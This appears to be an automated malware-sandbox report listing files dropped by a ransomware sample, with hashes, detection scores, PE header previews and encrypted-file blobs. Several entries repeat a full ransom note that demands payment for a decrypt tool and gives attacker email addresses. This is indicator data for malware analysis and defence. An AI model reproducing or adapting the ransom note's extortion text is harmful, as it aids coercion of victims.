                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):902856
                                                                                                                                              Entropy (8bit):6.618307623021751
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:I2wMm7l55+OeO+OeNhBBhhBBaELPA081o9baXpL3K+HDFgZUid4X9dCU5+Kazw4t:I2wMm7lfCIL3K+gY9dfcw4h3DX9X1
                                                                                                                                              MD5:9049FABA5517305C44BD5F28398FB6B9
                                                                                                                                              SHA1:036C6B32F3E7D7D689C9B4D482091EEBCC669BFA
                                                                                                                                              SHA-256:D2100FFE58EB50C05D97A3DA738CCD1F0BE9672C057C26A10140AF80595B78C3
                                                                                                                                              SHA-512:65A33506F970675775468F80B94A3F8BB2D3672E6FB08FC9F2E5107020095CA6D4BCA927C59B72488E2EF4208A64A56CED7511EA14C0445CD50EA3FF9B827F6A
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                              Joe Sandbox View:
                                                                                                                                              • Filename: TD2HjoogPx.dll, Detection: malicious, Browse
                                                                                                                                              • Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{h.............x......x..r...x......o......o......o......o......x......x..........q....o.......o...............o......Rich....................PE..L.....\g.....................$......<.............@.......................................@..................................K...........q...............(...`......0b..p....................c.......b..@...............0............................text............................... ..`.rdata.............................@..@.data...l....`...^...F..............@....rsrc....q.......r..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):211656
                                                                                                                                              Entropy (8bit):6.682260957753181
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
                                                                                                                                              MD5:FCCD129F6A5B9D2133D14922A3614F02
                                                                                                                                              SHA1:E814C637E6F0C21F3AA9B43FB92CB161B4D451FC
                                                                                                                                              SHA-256:4B4A87552C44158FB53A72C7294319B0DDDE9F99F460425AD5997D3B9121CD1E
                                                                                                                                              SHA-512:C1594504053BBE2B061880D1FF69819ECA8BDD2BC882B74F415FF8A1515389E32B8D7CD1B931D65B042247FD05DF1751A000D6DA4219427B74E9CDB0E0E52979
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                              Joe Sandbox View:
                                                                                                                                              • Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.B.5.,.5.,.5.,.F./.8.,.F.)...,.F.(.#.,.g.(.:.,.g./. .,.g.).p.,.F.-.6.,.5.-.J.,...%.7.,....4.,.....4.,.Rich5.,.........................PE..L.....\g...........!................v~.......................................@............@.....................................(........................(... ..........p...............................@...............8............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.248703819195731
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:0kKgCsofkhdUlRVRLw6qJBjY5BjYhw+2K6zXrVPm3h+Wn:rKgCsoiylR06Gi5BjW6PlmR+Wn
                                                                                                                                              MD5:4405851D1225F34A5214B2DBF59F22DC
                                                                                                                                              SHA1:A6E6783A8F1FC895DE41BC413C6C0D6F235B75A3
                                                                                                                                              SHA-256:6A8EA7162D059E8BC8C11C2372ACC1A79F32FC5367FD53182859FF26743B9D71
                                                                                                                                              SHA-512:640F4F96F4D05032B3A7E3AF75671298DB8CBA868BF8E0D796068EBB9849A9435AE97D20EC675098A68127C841F4B85660C46A96B838D8F37574EE51F222C15F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..n.0..U+...v`K.............:....}7...3..)..]4..b.ZV~.;..WU..JY.cH..SM...J.fi....N.[D....huPqS.D.cFD......f....s..(.....y..*.reOm..o9...*.... .gX&.0.....0k....,......./51L.z.....A.U5...._.a.P....e.f.v...;P.2..iT...'..U.....T#.S.M*.>T.3.E._?FG....!.>.. 2..Z`.Klt.XS.N.T..4.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):288
                                                                                                                                              Entropy (8bit):7.269586525805194
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:KnCdnmUxdXLaTGfXGXhDLEENoibyqTFiGf+/KPVUvU0aOddT9pHn:KnAmUvI0WXhDL7oiPmyPVUvU0hT/Hn
                                                                                                                                              MD5:6814FD5FEFDC857CF3004C27A3F226DC
                                                                                                                                              SHA1:75C102A5DECFA63E7EB88FA65B84D8DA9C0D06D2
                                                                                                                                              SHA-256:7FB34D3BE7F309ED69ED39FCAFF3BD98A206865B6E164BCD57A67D8B337D27E7
                                                                                                                                              SHA-512:E762A0AC2592CEEF65401D85770EB1850FDDE0F17DA830C6F6823BE59D363B5965C88FB5EC9D3CE113BE65ECAFC3EF881DDBC3BAC4EB27C67BC5CB62D967C96C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.N.....T...?f..>>].>>N.l$b..WG[..!:......Z.,l.I.o.....\~&....d.i.N...c5&-.r.C....=..z.P.Q\.&..S.5./.B'..E.../..?.].%..7..O.R........Q.......%.o.-....n*o.. ..........k.i...L..n... .1YM....!...n.!..rG.....q.VB.?.A-.,.......>...9...=......%.7,.rZ%u.Rt+._g....v.sY.u0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):288
                                                                                                                                              Entropy (8bit):7.269586525805194
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:KnCdnmUxdXLaTGfXGXhDLEENoibyqTFiGf+/KPVUvU0aOddT9pHn:KnAmUvI0WXhDL7oiPmyPVUvU0hT/Hn
                                                                                                                                              MD5:6814FD5FEFDC857CF3004C27A3F226DC
                                                                                                                                              SHA1:75C102A5DECFA63E7EB88FA65B84D8DA9C0D06D2
                                                                                                                                              SHA-256:7FB34D3BE7F309ED69ED39FCAFF3BD98A206865B6E164BCD57A67D8B337D27E7
                                                                                                                                              SHA-512:E762A0AC2592CEEF65401D85770EB1850FDDE0F17DA830C6F6823BE59D363B5965C88FB5EC9D3CE113BE65ECAFC3EF881DDBC3BAC4EB27C67BC5CB62D967C96C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.N.....T...?f..>>].>>N.l$b..WG[..!:......Z.,l.I.o.....\~&....d.i.N...c5&-.r.C....=..z.P.Q\.&..S.5./.B'..E.../..?.].%..7..O.R........Q.......%.o.-....n*o.. ..........k.i...L..n... .1YM....!...n.!..rG.....q.VB.?.A-.,.......>...9...=......%.7,.rZ%u.Rt+._g....v.sY.u0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):7.255101924719326
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:GmqWOOV9yvtpnCcbPTRZIbJwTdhnbR5/mmyaYIlAJ+Kvhw9rfn:pqWDivtpbXIbsdhnbR1lyaNEvhwZfn
                                                                                                                                              MD5:F427DC23D718E26091F643F2992741D9
                                                                                                                                              SHA1:537E7C0FBE9F6E6CD0C5F1AF3F3A86A6A3CC6734
                                                                                                                                              SHA-256:7A1068EAE8141D3FDF47B0102774EB7B10DD8021C23559C5BCB56461F67D9EDC
                                                                                                                                              SHA-512:EE730DEC04FD6C806A9FEF674D2D49CDA38DFDDE70D5300CBD39B5B6E7897EA1531A3EE35E868B17108CDFF5F80020F9C4B5B62DA922472371C976666882753A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..6..>.l..H..Z..<<>>].>>+,.C.....QR....O.j.;.fQ<5.64=.z...Rvg.K.e.d..chC.......}8.<.$.j....TX..<.n....D...&.../.~,(|....7`..8..XK.....nQ.....1.......^.>=...B..!.|..ub%}.x.@..>.U..n.."4kx.-r...7^m.R.x.Sn...-.......!.|..\D..v...R.....!..MP..m..^..IEW.....V./...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):7.255101924719326
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:GmqWOOV9yvtpnCcbPTRZIbJwTdhnbR5/mmyaYIlAJ+Kvhw9rfn:pqWDivtpbXIbsdhnbR1lyaNEvhwZfn
                                                                                                                                              MD5:F427DC23D718E26091F643F2992741D9
                                                                                                                                              SHA1:537E7C0FBE9F6E6CD0C5F1AF3F3A86A6A3CC6734
                                                                                                                                              SHA-256:7A1068EAE8141D3FDF47B0102774EB7B10DD8021C23559C5BCB56461F67D9EDC
                                                                                                                                              SHA-512:EE730DEC04FD6C806A9FEF674D2D49CDA38DFDDE70D5300CBD39B5B6E7897EA1531A3EE35E868B17108CDFF5F80020F9C4B5B62DA922472371C976666882753A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..6..>.l..H..Z..<<>>].>>+,.C.....QR....O.j.;.fQ<5.64=.z...Rvg.K.e.d..chC.......}8.<.$.j....TX..<.n....D...&.../.~,(|....7`..8..XK.....nQ.....1.......^.>=...B..!.|..ub%}.x.@..>.U..n.."4kx.-r...7^m.R.x.Sn...-.......!.|..\D..v...R.....!..MP..m..^..IEW.....V./...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65716
                                                                                                                                              Entropy (8bit):6.568934754021111
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:BVLn1nwyJhnxsxPwkZ6x5RX1X2QdQZiXEWZBMZ/dYS8VLm+kig+GPG6/:X1wSnxslEkZ4ZeZutbzfO
                                                                                                                                              MD5:42F14A224057C2C6C5DEF73D9742DD24
                                                                                                                                              SHA1:F6685B8BE91AE893B8864A483619C36502DA2BA5
                                                                                                                                              SHA-256:0D43B4E83A7C8961907223B9A5BECCE774D87C4F38CA49D84E749B2CE0E54CB8
                                                                                                                                              SHA-512:DD1ECAC767A936998172D86F85EDE8107D041DE26105DF62C46356D836DBF0E260B1AC1845CB06A18FFAE98C4E3A0AC131401B6F3EBAEFDB387F13825CF6527F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....BHz..5o.....Q4(F.&.p..^7.....KF..|.=P.,6...A....P.....2...Z.S....*34m.?2.\z$..M9.@..O.h....pBbn{....S5...%..$~..w].+.W..f.r...).XN.G..Z&m.S.s.P...M.4+C*..0.Lv~.n.......K........z0..p..6.n.....f."...d.#...b.).&.+..(.../....../a..........[Y......rf....I5.~s...~...^..F..v......;..rV..:sL..eM....T9JDaJ......TC.u....v..UH...j.w......:f....../.T0/(.b...SLO..j...h`.C.A...T$...{..#[.Y.d.....H..._......../\._..N....>av.m^../..7.n3|X*=QW.4<.O....3.2.....~........>..h. .L.....1..N..c..m.>..IK.Sz....C..G,l.\nB}v{..4..}A........y.cD....-Q........},..K._+$. .......k.H,......p.9B....jv3Z.K..N..wh..Y.'.~Q...?...l.i7..{0..........2.s@OU.>{...m..3...)A.y........o........c.|..]u..O`...N...L.......X......08.C.,bma.i.G..f="..'......"...@..p......G......w-......E..j.D.....v...i...\u".0.. .nNX...NY.^.^-N...h.O./....0....}..99e.....x.Vy...9Y..F.^Q...'./.g_....3:D&..t?...p.......pl..[j^.U....]c.I.z.../...I.]....3...`P....<VV..F.v......S..[%...M.q.#`...F..Q=
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65716
                                                                                                                                              Entropy (8bit):6.568934754021111
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:BVLn1nwyJhnxsxPwkZ6x5RX1X2QdQZiXEWZBMZ/dYS8VLm+kig+GPG6/:X1wSnxslEkZ4ZeZutbzfO
                                                                                                                                              MD5:42F14A224057C2C6C5DEF73D9742DD24
                                                                                                                                              SHA1:F6685B8BE91AE893B8864A483619C36502DA2BA5
                                                                                                                                              SHA-256:0D43B4E83A7C8961907223B9A5BECCE774D87C4F38CA49D84E749B2CE0E54CB8
                                                                                                                                              SHA-512:DD1ECAC767A936998172D86F85EDE8107D041DE26105DF62C46356D836DBF0E260B1AC1845CB06A18FFAE98C4E3A0AC131401B6F3EBAEFDB387F13825CF6527F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....BHz..5o.....Q4(F.&.p..^7.....KF..|.=P.,6...A....P.....2...Z.S....*34m.?2.\z$..M9.@..O.h....pBbn{....S5...%..$~..w].+.W..f.r...).XN.G..Z&m.S.s.P...M.4+C*..0.Lv~.n.......K........z0..p..6.n.....f."...d.#...b.).&.+..(.../....../a..........[Y......rf....I5.~s...~...^..F..v......;..rV..:sL..eM....T9JDaJ......TC.u....v..UH...j.w......:f....../.T0/(.b...SLO..j...h`.C.A...T$...{..#[.Y.d.....H..._......../\._..N....>av.m^../..7.n3|X*=QW.4<.O....3.2.....~........>..h. .L.....1..N..c..m.>..IK.Sz....C..G,l.\nB}v{..4..}A........y.cD....-Q........},..K._+$. .......k.H,......p.9B....jv3Z.K..N..wh..Y.'.~Q...?...l.i7..{0..........2.s@OU.>{...m..3...)A.y........o........c.|..]u..O`...N...L.......X......08.C.,bma.i.G..f="..'......"...@..p......G......w-......E..j.D.....v...i...\u".0.. .nNX...NY.^.^-N...h.O./....0....}..99e.....x.Vy...9Y..F.^Q...'./.g_....3:D&..t?...p.......pl..[j^.U....]c.I.z.../...I.]....3...`P....<VV..F.v......S..[%...M.q.#`...F..Q=
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1003
                                                                                                                                              Entropy (8bit):7.808486331531483
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Sb5M87M2stTPjQCSm8JbBnixVNchxKrmg9SCB3v+r2FtS:2CRrQC18rixn26Z9SWfnq
                                                                                                                                              MD5:EA71DCF9B6C47FB3748F9219DC9B67C3
                                                                                                                                              SHA1:BF030624C124FDB4EC41659D2971DAEF7EFDC3AA
                                                                                                                                              SHA-256:A8D0AF745FDDAFB2D35F2BF6379633262BCCE785AF33E48766C2F1B211B3A222
                                                                                                                                              SHA-512:67C049A9E8EFD4E97987F546E8090D3C86614AD09E2D60E586B2BAC0E43EB51754173A1D1101FA20236853EB3AD419D912370D41EB25F19041BC75BC1B898F39
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......[...^.}.+.......O_\(q.b~..=....9......Q..v.O..G.......I....%..8.........#....N.l:...p.c.Y*...>mg..|-.....royT.>.W.........y(aO......E.<&.(..=.?.UI._...P. .. .>.6)...f.5+.......z.....D._.]@..x....Du...%.S.V..[h5..U.t.K...L..?......k~.<....w....|.y..d*..U.I.?w.8.47.\..(4..f.i......=...`.w.#+-..E5.....:^'..=.......5....Z..^Y....J..z..$....p.P....u.tx.....#...r.X..E.K....O..u...S*Pv...9...Wv.%..Jkmm.Fe...4.l..u.....Y....N..z?.I?.p-7.....?...:.h..z.#J1...+.xD. ....~...l.x./O.@#.,r.X..Z..W..ePrR.|`.y..=.6..i.hYg.....l..c...u....#W...A5.o2.Q...\.......8.......'......m...8.!.>..i.....$....}.r..v}......m).h.t.n...E...2S&.....o.....t....O..$|s1s.-..)d.Ce......'.....Z../.=.p.d.........Y.].....y..C...q...]......'.5..vQ...oxX..G.D.....d.......-.u....6F.9...PA...sQ7tlus..6|F.....ahq.Mh.I.y.q.P}i.-..|KT3........J...'4>..\.m.4....G.........y.D..7E..H.....N!..J.FN..!..)..%....K...Y;.O.:w.[...;.8.5iN..@......vPE...FwQ.=.G....E$$Y`......Y:t,.._6@zG.j0xABADC
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1003
                                                                                                                                              Entropy (8bit):7.808486331531483
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Sb5M87M2stTPjQCSm8JbBnixVNchxKrmg9SCB3v+r2FtS:2CRrQC18rixn26Z9SWfnq
                                                                                                                                              MD5:EA71DCF9B6C47FB3748F9219DC9B67C3
                                                                                                                                              SHA1:BF030624C124FDB4EC41659D2971DAEF7EFDC3AA
                                                                                                                                              SHA-256:A8D0AF745FDDAFB2D35F2BF6379633262BCCE785AF33E48766C2F1B211B3A222
